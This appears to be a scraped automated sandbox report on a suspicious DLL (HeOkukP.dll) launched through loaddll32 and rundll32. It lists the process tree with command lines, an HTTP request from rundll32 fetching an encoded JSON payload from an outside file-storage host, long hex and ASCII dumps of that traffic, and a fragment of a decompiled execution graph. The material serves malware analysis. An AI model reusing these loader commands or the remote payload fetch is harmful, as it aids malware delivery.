Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:14.734086037 CEST1236INData Raw: 53 30 42 72 53 36 54 72 53 33 5c 72 53 32 5a 72 53 31 55 72 53 30 5b 72 53 36 59 72 53 32 56 73 53 35 64 73 53 35 58 73 53 37 56 73 53 37 50 72 53 37 51 72 53 37 42 72 53 37 55 72 53 32 50 72 53 30 55 72 53 38 57 72 53 38 4f 72 53 32 51 72 53 39
Data Ascii: S0BrS6TrS3\rS2ZrS1UrS0[rS6YrS2VsS5dsS5XsS7VsS7PrS7QrS7BrS7UrS2PrS0UrS8WrS8OrS2QrS9BrS7UrS0ZrS7TrS0QrS0BrS9OrS6YrS6^rS2[rS4]rS8PrS4PrS0SrS5UrS2BrS4SrS6UrS4VrS0]rS6\rS0]rS9\rS5VsS6dsS7XsS2VsS7PrS2VrS0TrS6XrS0OrS5BrS0VrS3YrS8\rS6[rS3]rS4]rS9QrS4B
Aug 31, 2024 22:05:14.734142065 CEST1236INData Raw: 53 36 51 72 53 31 5a 72 53 34 5b 72 53 34 57 72 53 32 51 72 53 37 55 72 53 34 5e 72 53 35 5c 72 53 30 5b 72 53 38 5d 72 53 35 53 72 53 33 53 72 53 39 50 72 53 38 5b 72 53 38 5a 72 53 35 54 72 53 39 50 72 53 31 59 72 53 34 5d 72 53 36 4f 72 53 32
Data Ascii: S6QrS1ZrS4[rS4WrS2QrS7UrS4^rS5\rS0[rS8]rS5SrS3SrS9PrS8[rS8ZrS5TrS9PrS1YrS4]rS6OrS2YrS4QrS2VsS9dsS5XsS9VsS0PrS9BrS0YrS5[rS8BrS1]rS1\rS5UrS7UrS4QrS8VrS3TrS5QrS0BrS2YrS0TrS2UrS2XrS2WrS9TrS0BrS3QrS8ZrS5BrS3^rS3XrS8WrS6YrS3OrS7BrS1YrS6WrS4VsS9dsS8X
Aug 31, 2024 22:05:14.734148979 CEST1236INData Raw: 53 30 53 72 53 32 56 73 53 36 64 73 53 38 58 73 53 32 56 73 53 39 4f 72 53 38 5a 72 53 30 57 72 53 36 5e 72 53 39 51 72 53 37 51 72 53 36 5c 72 53 39 5a 72 53 32 54 72 53 36 55 72 53 35 54 72 53 35 50 72 53 36 5c 72 53 35 42 72 53 39 5b 72 53 30
Data Ascii: S0SrS2VsS6dsS8XsS2VsS9OrS8ZrS0WrS6^rS9QrS7QrS6\rS9ZrS2TrS6UrS5TrS5PrS6\rS5BrS9[rS0YrS9ZrS5OrS1WrS0PrS5\rS2UrS9TrS5ZrS7QrS9WrS3SrS8[rS0^rS1\rS6]rS4OrS8VsS0dsS6XsS2VsS0OrS3XrS2QrS9PrS6]rS1VrS5XrS3OrS6TrS9OrS0TrS2VrS4]rS3TrS3TrS5YrS0]rS5\rS3VrS6Z
Aug 31, 2024 22:05:14.734173059 CEST1236INData Raw: 53 32 5c 72 53 34 59 72 53 34 53 72 53 36 54 72 53 35 5a 72 53 35 51 72 53 36 5e 72 53 38 53 72 53 37 5a 72 53 37 5d 72 53 36 51 72 53 31 55 72 53 34 5d 72 53 36 54 72 53 37 54 72 53 32 5b 72 53 39 56 73 53 36 64 73 53 35 58 73 53 34 56 73 53 39
Data Ascii: S2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5XrS2^rS2WrS6ZrS4OrS2PrS5^rS6QrS0VrS2BrS6BrS0XrS2BrS7ZrS1SrS6^rS6PrS4YrS6SrS4QrS0]rS3VsS3dsS9XsS8VsS2VrS1PrS5QrS8[rS2\
Aug 31, 2024 22:05:14.734179020 CEST1236INData Raw: 53 30 58 72 53 34 5a 72 53 39 53 72 53 33 59 72 53 38 51 72 53 37 5a 72 53 31 5b 72 53 30 5d 72 53 38 58 72 53 37 57 72 53 36 51 72 53 35 50 72 53 31 58 72 53 32 56 72 53 39 5b 72 53 33 56 72 53 38 5e 72 53 37 55 72 53 35 5d 72 53 30 5a 72 53 36
Data Ascii: S0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0VsS8dsS1XsS2VsS9VrS4XrS7\rS8BrS8SrS0VrS1TrS7ZrS1BrS9UrS2WrS4WrS4TrS7\rS4VrS5[rS1BrS5OrS3OrS9ZrS7VrS2BrS5BrS8UrS1ZrS8X
Aug 31, 2024 22:05:14.734184980 CEST1236INData Raw: 53 37 55 72 53 34 4f 72 53 37 57 72 53 31 51 72 53 37 4f 72 53 35 5a 72 53 38 54 72 53 32 50 72 53 38 55 72 53 39 4f 72 53 39 56 73 53 36 64 73 53 35 58 73 53 31 56 73 53 31 55 72 53 34 51 72 53 36 5a 72 53 35 55 72 53 39 50 72 53 30 51 72 53 38
Data Ascii: S7UrS4OrS7WrS1QrS7OrS5ZrS8TrS2PrS8UrS9OrS9VsS6dsS5XsS1VsS1UrS4QrS6ZrS5UrS9PrS0QrS8]rS3YrS2[rS9BrS4VrS7ZrS1UrS2TrS9\rS9VrS4\rS2]rS6QrS9BrS3BrS3OrS7YrS5ZrS0TrS8QrS7XrS6YrS1SrS5WrS0WrS7QrS7VsS8dsS4XsS0VsS7UrS1PrS0BrS7YrS0UrS0^rS7ZrS6^rS2\rS3\rS7B
Aug 31, 2024 22:05:14.734191895 CEST1236INData Raw: 53 38 5b 72 53 39 5c 72 53 36 5a 72 53 30 55 72 53 32 59 72 53 35 5e 72 53 31 59 72 53 31 51 72 53 33 59 72 53 34 56 72 53 37 5b 72 53 37 5d 72 53 34 54 72 53 36 54 72 53 39 42 72 53 32 42 72 53 35 5e 72 53 35 54 72 53 30 5a 72 53 39 55 72 53 32
Data Ascii: S8[rS9\rS6ZrS0UrS2YrS5^rS1YrS1QrS3YrS4VrS7[rS7]rS4TrS6TrS9BrS2BrS5^rS5TrS0ZrS9UrS2OrS6]rS2WrS3QrS1SrS1VsS8dsS4XsS5VsS2UrS1YrS0YrS3]rS1\rS1]rS9YrS9[rS5YrS4BrS8QrS8TrS6OrS0[rS6WrS8PrS6TrS5YrS3WrS8PrS1^rS2XrS5TrS3VrS8UrS8[rS5XrS3BrS3OrS9SrS8PrS0Z
Aug 31, 2024 22:05:14.738936901 CEST1236INData Raw: 53 36 5a 72 53 33 57 72 53 31 59 72 53 38 42 72 53 38 56 73 53 39 64 73 53 36 58 73 53 32 56 73 53 37 54 72 53 35 4f 72 53 33 5c 72 53 30 5b 72 53 30 56 72 53 34 4f 72 53 31 5a 72 53 36 59 72 53 35 5a 72 53 36 42 72 53 34 50 72 53 36 4f 72 53 31
Data Ascii: S6ZrS3WrS1YrS8BrS8VsS9dsS6XsS2VsS7TrS5OrS3\rS0[rS0VrS4OrS1ZrS6YrS5ZrS6BrS4PrS6OrS1XrS0YrS8[rS1TrS7YrS4VrS9WrS0WrS0UrS2QrS8YrS0[rS9UrS8XrS6SrS2BrS6YrS7XrS3WrS1^rS0VsS4dsS3XsS1VsS1TrS4VrS6OrS0WrS1[rS6OrS9\rS2TrS6ZrS9YrS2PrS0OrS4^rS5\rS5\rS4WrS8Y


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.749711185.22.66.16808024C:\Windows\SysWOW64\rundll32.exe
TimestampBytes transferredDirectionData
Aug 31, 2024 22:05:16.210118055 CEST116OUTGET /clrls/cl_rls.json HTTP/1.1
Host: www.rapidfilestorage.com
Connection: Keep-Alive
Cache-Control: no-cache
Aug 31, 2024 22:05:17.003241062 CEST1236INHTTP/1.1 200 OK
Server: openresty
Date: Sat, 31 Aug 2024 20:05:16 GMT
Content-Type: application/json
Content-Length: 50997
Connection: keep-alive
Set-Cookie: slb_route=13db8a2aaddbafa89a4e74ec4a29bdac; Path=/; Secure; HttpOnly
Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT
ETag: "66bb4169-c735"
Accept-Ranges: bytes
X-Resolver-IP: 185.22.66.16
X-Resolver-IP: 185.22.66.16
Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED]
Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
Aug 31, 2024 22:05:17.003253937 CEST1236INData Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30
Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:17.003264904 CEST448INData Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32
Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:17.003782034 CEST1236INData Raw: 53 33 51 72 53 35 56 72 53 33 4f 72 53 30 5d 72 53 36 5c 72 53 30 57 72 53 33 5b 72 53 33 42 72 53 37 4f 72 53 37 57 72 53 35 55 72 53 36 53 72 53 31 5c 72 53 36 5d 72 53 30 58 72 53 38 53 72 53 38 59 72 53 34 5a 72 53 31 51 72 53 32 53 72 53 36
Data Ascii: S3QrS5VrS3OrS0]rS6\rS0WrS3[rS3BrS7OrS7WrS5UrS6SrS1\rS6]rS0XrS8SrS8YrS4ZrS1QrS2SrS6BrS9[rS0\rS6TrS0VsS2dsS8XsS5VsS1QrS6^rS0UrS8SrS1SrS3BrS3QrS2PrS0^rS5YrS0UrS2ZrS0SrS3PrS2UrS5QrS6SrS4]rS1TrS4ZrS5\rS9[rS9VrS1OrS2YrS8XrS7OrS4]rS1PrS7[rS4\rS5PrS1V
Aug 31, 2024 22:05:17.003803015 CEST224INData Raw: 53 38 51 72 53 37 56 72 53 38 58 72 53 37 56 73 53 32 64 73 53 31 58 73 53 38 56 73 53 30 50 72 53 38 5a 72 53 36 50 72 53 35 5e 72 53 33 56 72 53 32 4f 72 53 31 53 72 53 33 50 72 53 30 58 72 53 37 50 72 53 35 5e 72 53 30 59 72 53 33 42 72 53 37
Data Ascii: S8QrS7VrS8XrS7VsS2dsS1XsS8VsS0PrS8ZrS6PrS5^rS3VrS2OrS1SrS3PrS0XrS7PrS5^rS0YrS3BrS7UrS1SrS7PrS5UrS2OrS0^rS0]rS8OrS9\rS8\rS6VrS0VrS0\rS2[rS4BrS5\rS9ZrS7XrS6]rS4VsS5dsS1XsS5VsS4PrS5ZrS1]rS4]rS1[rS1]rS9YrS6YrS2\rS1YrS6SrS8[rS6Tr
Aug 31, 2024 22:05:17.003895044 CEST1236INData Raw: 53 30 57 72 53 34 58 72 53 35 4f 72 53 36 51 72 53 32 42 72 53 34 55 72 53 38 53 72 53 34 58 72 53 37 58 72 53 36 5c 72 53 34 56 72 53 36 42 72 53 35 50 72 53 38 59 72 53 31 57 72 53 36 50 72 53 33 5e 72 53 31 5c 72 53 38 42 72 53 39 56 73 53 31
Data Ascii: S0WrS4XrS5OrS6QrS2BrS4UrS8SrS4XrS7XrS6\rS4VrS6BrS5PrS8YrS1WrS6PrS3^rS1\rS8BrS9VsS1dsS5XsS1VsS0PrS4XrS0SrS9XrS3ZrS6QrS9[rS3PrS0PrS3XrS9YrS5TrS8OrS9XrS0[rS5VrS6OrS4SrS1PrS0BrS1\rS2[rS3QrS6QrS6^rS7XrS1ZrS0^rS7WrS9PrS9VrS1VrS1VsS8dsS3XsS9VsS5PrS2W
Aug 31, 2024 22:05:17.003935099 CEST224INData Raw: 53 37 58 73 53 31 56 73 53 32 4f 72 53 32 55 72 53 30 51 72 53 36 5a 72 53 36 51 72 53 31 51 72 53 36 5d 72 53 31 55 72 53 36 5a 72 53 34 56 72 53 35 55 72 53 30 5b 72 53 31 5d 72 53 38 59 72 53 30 5b 72 53 31 5c 72 53 36 54 72 53 30 5d 72 53 39
Data Ascii: S7XsS1VsS2OrS2UrS0QrS6ZrS6QrS1QrS6]rS1UrS6ZrS4VrS5UrS0[rS1]rS8YrS0[rS1\rS6TrS0]rS9\rS5TrS2WrS0ZrS4]rS2\rS9QrS7TrS8PrS2XrS8WrS3\rS5SrS2QrS1VsS7dsS9XsS9VsS1OrS0TrS9TrS0PrS5PrS5XrS7QrS4BrS9BrS6BrS4UrS7UrS7OrS7]rS6YrS7PrS2BrS3Ur
Aug 31, 2024 22:05:17.004110098 CEST1236INData Raw: 53 31 5e 72 53 30 5b 72 53 33 51 72 53 35 42 72 53 36 57 72 53 33 56 72 53 34 5d 72 53 30 4f 72 53 34 53 72 53 34 58 72 53 35 5b 72 53 35 5c 72 53 38 5d 72 53 38 5a 72 53 33 56 73 53 31 64 73 53 36 58 73 53 32 56 73 53 37 4f 72 53 34 5a 72 53 36
Data Ascii: S1^rS0[rS3QrS5BrS6WrS3VrS4]rS0OrS4SrS4XrS5[rS5\rS8]rS8ZrS3VsS1dsS6XsS2VsS7OrS4ZrS6QrS7OrS3QrS2OrS0OrS4SrS3TrS8YrS5]rS3^rS4ZrS5TrS6BrS3OrS6PrS9TrS6\rS3]rS7YrS7YrS3QrS7WrS5ZrS9UrS6QrS4SrS8OrS0SrS1[rS8\rS7VsS3dsS7XsS0VsS5OrS6ZrS3PrS3OrS7QrS6WrS6O
Aug 31, 2024 22:05:17.004163027 CEST224INData Raw: 53 31 55 72 53 39 53 72 53 34 5a 72 53 32 5d 72 53 33 58 72 53 30 56 72 53 38 54 72 53 33 56 72 53 33 5d 72 53 34 5c 72 53 32 55 72 53 38 59 72 53 30 5e 72 53 35 58 72 53 39 55 72 53 34 59 72 53 30 50 72 53 30 58 72 53 34 5c 72 53 31 55 72 53 35
Data Ascii: S1UrS9SrS4ZrS2]rS3XrS0VrS8TrS3VrS3]rS4\rS2UrS8YrS0^rS5XrS9UrS4YrS0PrS0XrS4\rS1UrS5]rS7TrS7VrS3WrS6[rS6XrS0VrS7ZrS9^rS8VsS8dsS8XsS8VsS2OrS8[rS3ZrS1UrS1OrS2\rS9SrS4BrS8ZrS6PrS2BrS6BrS6XrS2BrS6QrS5[rS0WrS6UrS4YrS2^rS9QrS6YrS8Or
Aug 31, 2024 22:05:17.004173994 CEST1236INData Raw: 53 32 5a 72 53 38 5a 72 53 33 53 72 53 37 53 72 53 36 53 72 53 34 4f 72 53 33 5d 72 53 35 58 72 53 35 50 72 53 38 56 73 53 36 64 73 53 33 58 73 53 33 56 73 53 38 4f 72 53 39 42 72 53 34 50 72 53 32 53 72 53 33 5a 72 53 35 42 72 53 35 51 72 53 38
Data Ascii: S2ZrS8ZrS3SrS7SrS6SrS4OrS3]rS5XrS5PrS8VsS6dsS3XsS3VsS8OrS9BrS4PrS2SrS3ZrS5BrS5QrS8^rS2TrS7TrS3SrS3]rS6SrS1[rS5OrS6]rS2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5X
Aug 31, 2024 22:05:17.008757114 CEST1236INData Raw: 53 33 51 72 53 35 5d 72 53 31 42 72 53 37 57 72 53 30 5b 72 53 31 53 72 53 38 5d 72 53 33 57 72 53 38 5d 72 53 35 5c 72 53 31 5d 72 53 33 42 72 53 34 54 72 53 35 5a 72 53 36 54 72 53 35 42 72 53 31 50 72 53 36 53 72 53 34 55 72 53 36 56 72 53 31
Data Ascii: S3QrS5]rS1BrS7WrS0[rS1SrS8]rS3WrS8]rS5\rS1]rS3BrS4TrS5ZrS6TrS5BrS1PrS6SrS4UrS6VrS1BrS6]rS4TrS9]rS6VsS8dsS4XsS5VsS5VrS0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0V


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:1
Start time:16:05:12
Start date:31/08/2024
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll"
Imagebase:0x2c0000
File size:126'464 bytes
MD5 hash:51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:16:05:12
Start date:31/08/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:16:05:12
Start date:31/08/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:16:05:12
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1
Imagebase:0x480000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:16:05:12
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:0x480000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:16:05:15
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Imagebase:0x480000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Reset < >

    Execution Graph

    Execution Coverage:3.2%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:11.2%
    Total number of Nodes:578
    Total number of Limit Nodes:5
    execution_graph 1702 4c233b0 1705 4c233da __except_handler4 __IsNonwritableInCurrentImage 1702->1705 1703 4c234c4 __except_handler4 1705->1703 1742 4c27492 RtlUnwind 1705->1742 1706 4c2348c __except_handler4 1707 4c23681 1706->1707 1708 4c2357b 1706->1708 1709 4c23686 1707->1709 1710 4c236d4 1707->1710 1744 4c2e1c6 1708->1744 1758 4c22c29 1709->1758 1716 4c22c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1710->1716 1722 4c2363c 1710->1722 1714 4c23695 1717 4c236be 1714->1717 1720 4c20897 __calloc_crt 54 API calls 1714->1720 1715 4c235a8 GetLastError 1718 4c235b7 1715->1718 1715->1722 1716->1722 1717->1722 1723 4c18bc4 _free 54 API calls 1717->1723 1721 4c2e1c6 ___crtGetLocaleInfoA 56 API calls 1718->1721 1719 4c20897 __calloc_crt 54 API calls 1724 4c23624 1719->1724 1727 4c236a6 1720->1727 1728 4c235cd 1721->1728 1723->1722 1725 4c23651 1724->1725 1726 4c2362e 1724->1726 1749 4c2e03e 1725->1749 1726->1722 1730 4c18bc4 _free 54 API calls 1726->1730 1727->1717 1731 4c22c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1727->1731 1728->1722 1732 4c20897 __calloc_crt 54 API calls 1728->1732 1730->1722 1731->1717 1737 4c235e2 1732->1737 1734 4c23712 1736 4c24398 __invoke_watson 6 API calls 1734->1736 1735 4c2366e 1735->1722 1740 4c18bc4 _free 54 API calls 1735->1740 1738 4c2371c 1736->1738 1737->1722 1739 4c2e1c6 ___crtGetLocaleInfoA 56 API calls 1737->1739 1741 4c2360f 1739->1741 1740->1722 1741->1719 1741->1726 1743 4c274a6 1742->1743 1743->1706 1762 4c1ca16 1744->1762 1748 4c2359b 1748->1715 1748->1741 1753 4c2e04c 1749->1753 1750 4c2e050 1751 4c18edb _free 54 API calls 1750->1751 1752 4c23663 1750->1752 1757 4c2e07b 1751->1757 1752->1734 1752->1735 1753->1750 1753->1752 1755 4c2e08a 1753->1755 1754 4c24388 __NMSG_WRITE 7 API calls 1754->1752 1755->1752 1756 4c18edb _free 54 API calls 1755->1756 1756->1757 1757->1754 1759 4c22c45 1758->1759 1760 4c22c49 __crtGetLocaleInfoA_stat 1758->1760 1759->1714 1761 4c22c4e GetLocaleInfoW 1760->1761 1761->1714 1763 4c1ca27 1762->1763 1769 4c1ca74 1762->1769 1779 4c2452e 1763->1779 1766 4c1ca54 1766->1769 1799 4c29b58 1766->1799 1770 4c2e0e2 1769->1770 1771 4c22c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1770->1771 1775 4c2e10e __crtGetLocaleInfoA_stat 1771->1775 1772 4c2e117 1772->1748 1773 4c22c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1774 4c2e182 1773->1774 1776 4c2e1a9 1774->1776 1778 4c2e19a WideCharToMultiByte 1774->1778 1775->1772 1775->1773 2069 4c20879 1776->2069 1778->1776 1780 4c24546 __getptd_noexit 54 API calls 1779->1780 1781 4c24534 1780->1781 1782 4c2308a _LocaleUpdate::_LocaleUpdate 54 API calls 1781->1782 1783 4c1ca2d 1781->1783 1782->1783 1783->1766 1784 4c26ee3 1783->1784 1785 4c26eef __mtinitlocknum 1784->1785 1786 4c2452e _LocaleUpdate::_LocaleUpdate 54 API calls 1785->1786 1787 4c26ef8 1786->1787 1788 4c26f27 1787->1788 1789 4c26f0b 1787->1789 1790 4c1f65a __mtinitlocknum 54 API calls 1788->1790 1792 4c2452e _LocaleUpdate::_LocaleUpdate 54 API calls 1789->1792 1791 4c26f2e 1790->1791 1811 4c26f63 1791->1811 1794 4c26f10 1792->1794 1797 4c26f1e __mtinitlocknum 1794->1797 1798 4c2308a _LocaleUpdate::_LocaleUpdate 54 API calls 1794->1798 1797->1766 1798->1797 1800 4c29b64 __mtinitlocknum 1799->1800 1801 4c2452e _LocaleUpdate::_LocaleUpdate 54 API calls 1800->1801 1802 4c29b6e 1801->1802 1803 4c1f65a __mtinitlocknum 54 API calls 1802->1803 1805 4c29b80 1802->1805 1809 4c29b9e 1803->1809 1804 4c29bcb 2065 4c29bf5 1804->2065 1806 4c29b8e __mtinitlocknum 1805->1806 1808 4c2308a _LocaleUpdate::_LocaleUpdate 54 API calls 1805->1808 1806->1769 1808->1806 1809->1804 1810 4c18bc4 _free 54 API calls 1809->1810 1810->1804 1812 4c26f6e ___addlocaleref ___removelocaleref 1811->1812 1814 4c26f42 1811->1814 1812->1814 1818 4c26ce9 1812->1818 1815 4c26f5a 1814->1815 2064 4c1f7c4 LeaveCriticalSection 1815->2064 1817 4c26f61 1817->1794 1819 4c26d62 1818->1819 1822 4c26cfe 1818->1822 1820 4c18bc4 _free 54 API calls 1819->1820 1821 4c26daf 1819->1821 1823 4c26d83 1820->1823 1826 4c26dd8 1821->1826 1888 4c2f9df 1821->1888 1822->1819 1829 4c18bc4 _free 54 API calls 1822->1829 1832 4c26d2f 1822->1832 1825 4c18bc4 _free 54 API calls 1823->1825 1831 4c26d96 1825->1831 1830 4c26e37 1826->1830 1845 4c18bc4 54 API calls _free 1826->1845 1828 4c18bc4 _free 54 API calls 1828->1826 1834 4c26d24 1829->1834 1835 4c18bc4 _free 54 API calls 1830->1835 1836 4c18bc4 _free 54 API calls 1831->1836 1837 4c18bc4 _free 54 API calls 1832->1837 1847 4c26d4d 1832->1847 1833 4c18bc4 _free 54 API calls 1838 4c26d57 1833->1838 1848 4c2f2d5 1834->1848 1840 4c26e3d 1835->1840 1841 4c26da4 1836->1841 1842 4c26d42 1837->1842 1843 4c18bc4 _free 54 API calls 1838->1843 1840->1814 1844 4c18bc4 _free 54 API calls 1841->1844 1876 4c2f772 1842->1876 1843->1819 1844->1821 1845->1826 1847->1833 1849 4c2f2e4 1848->1849 1875 4c2f3cd 1848->1875 1850 4c2f2f5 1849->1850 1851 4c18bc4 _free 54 API calls 1849->1851 1852 4c2f307 1850->1852 1853 4c18bc4 _free 54 API calls 1850->1853 1851->1850 1854 4c18bc4 _free 54 API calls 1852->1854 1857 4c2f319 1852->1857 1853->1852 1854->1857 1855 4c2f32b 1856 4c2f33d 1855->1856 1859 4c18bc4 _free 54 API calls 1855->1859 1860 4c2f34f 1856->1860 1861 4c18bc4 _free 54 API calls 1856->1861 1857->1855 1858 4c18bc4 _free 